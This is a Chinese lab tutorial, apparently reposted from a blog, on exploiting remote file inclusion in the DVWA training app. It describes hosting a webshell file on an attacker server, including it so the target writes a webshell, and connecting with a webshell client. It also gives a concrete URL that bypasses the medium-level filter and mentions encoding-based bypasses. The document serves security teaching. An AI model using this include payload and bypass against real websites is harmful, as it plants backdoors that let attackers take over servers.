首页 > 其他 > 详细

文件包含之远程文件包含

时间:2020-07-29 22:30:46      阅读:154      评论:0      收藏:0      [点我收藏+]

远程文件包含漏洞想要彻底防御,可以在服务器上的 php.ini 文件中将 allow_url_fopen 选项a把 on 改为 off

技术分享图片

owasp的文件路径为/etc/php5/cli/php.ini(各系统会根据安装路径出现异同)

远程文件包含漏洞利用的思路是自己搭建一个服务器,将文件放在自己搭建的服务器内,远程包含即可

这里使用apache;开启服务

技术分享图片

 

 

我们在网站的主目录下建立一个文件,webshell.txt,写入一下代码

 

技术分享图片

 

 在靶机上远程包含该文件

技术分享图片

 

 在网站目录下可以看到webshell.php已经被创建了

技术分享图片

 

 老样子,菜刀连接

技术分享图片

 

 

将DVWA security等级调为 medium,后端源码限制变为:

技术分享图片

 

 str_replace()函数将 http:// 字符替换为空,我们可以进行简单的绕过,

比如在url中插入http://:hthttp://tp://192.168.243.130/webshell.txt

又或者进行编码绕过,把 http:// 编码为16进制或者Unicode、ASCⅡ、URL编码等。

 

 

 

当DVWA security等级调为high时:

 

 技术分享图片

 

 直接限制包含文件为 include.php。当前无解。

文件包含之远程文件包含

原文:https://www.cnblogs.com/luliblog/p/13398907.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!